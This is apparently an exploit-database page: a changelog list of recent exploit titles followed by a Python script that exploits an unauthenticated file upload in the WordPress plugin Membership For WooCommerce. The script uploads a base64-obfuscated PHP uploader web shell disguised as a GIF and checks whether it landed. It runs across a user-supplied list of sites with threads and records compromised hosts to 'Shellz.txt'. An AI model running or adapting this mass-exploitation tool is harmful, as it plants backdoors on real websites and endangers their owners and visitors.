
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
69 lines
No EOL
2.8 KiB
Text
69 lines
No EOL
2.8 KiB
Text
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
|
|
# Date: 2024-02-25
|
|
# Author: Milad Karimi (Ex3ptionaL)
|
|
# Category : webapps
|
|
# Tested on: windows 10 , firefox
|
|
|
|
import sys , requests, re , json
|
|
from multiprocessing.dummy import Pool
|
|
from colorama import Fore
|
|
from colorama import init
|
|
init(autoreset=True)
|
|
|
|
headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
|
|
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
|
|
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
|
|
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
|
|
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
|
|
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
|
|
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
|
|
|
|
uploader = """
|
|
GIF89a
|
|
<?php ?>
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>Resultz</title>
|
|
</head>
|
|
<body><h1>Uploader</h1>
|
|
<form enctype='multipart/form-data' action='' method='POST'>
|
|
<p>Uploaded</p>
|
|
<input type='file' name='uploaded_file'></input><br />
|
|
<input type='submit' value='Upload'></input>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
<?PHP
|
|
if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
|
|
base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
|
|
base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
|
|
"""
|
|
requests.urllib3.disable_warnings()
|
|
|
|
def Exploit(Domain):
|
|
try:
|
|
if 'http' in Domain:
|
|
Domain = Domain
|
|
else:
|
|
Domain = 'http://'+Domain
|
|
myup = {'': ('db.php', uploader)}
|
|
req = requests.post(Domain +
|
|
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
|
|
files=myup, headers=headers,verify=False, timeout=10).text
|
|
req1 = requests.get(Domain +
|
|
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
|
|
if 'Ex3ptionaL' in req1:
|
|
print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
|
|
open('Shellz.txt', 'a').write(Domain +
|
|
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
|
|
else:
|
|
print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
|
|
except:
|
|
print(fr+' -| ' + Domain + ' --> {} [Failed]')
|
|
|
|
target = open(input(fm+"Site List: "), "r").read().splitlines()
|
|
mp = Pool(int(input(fm+"Threads: ")))
|
|
mp.map(Exploit, target)
|
|
mp.close()
|
|
mp.join() |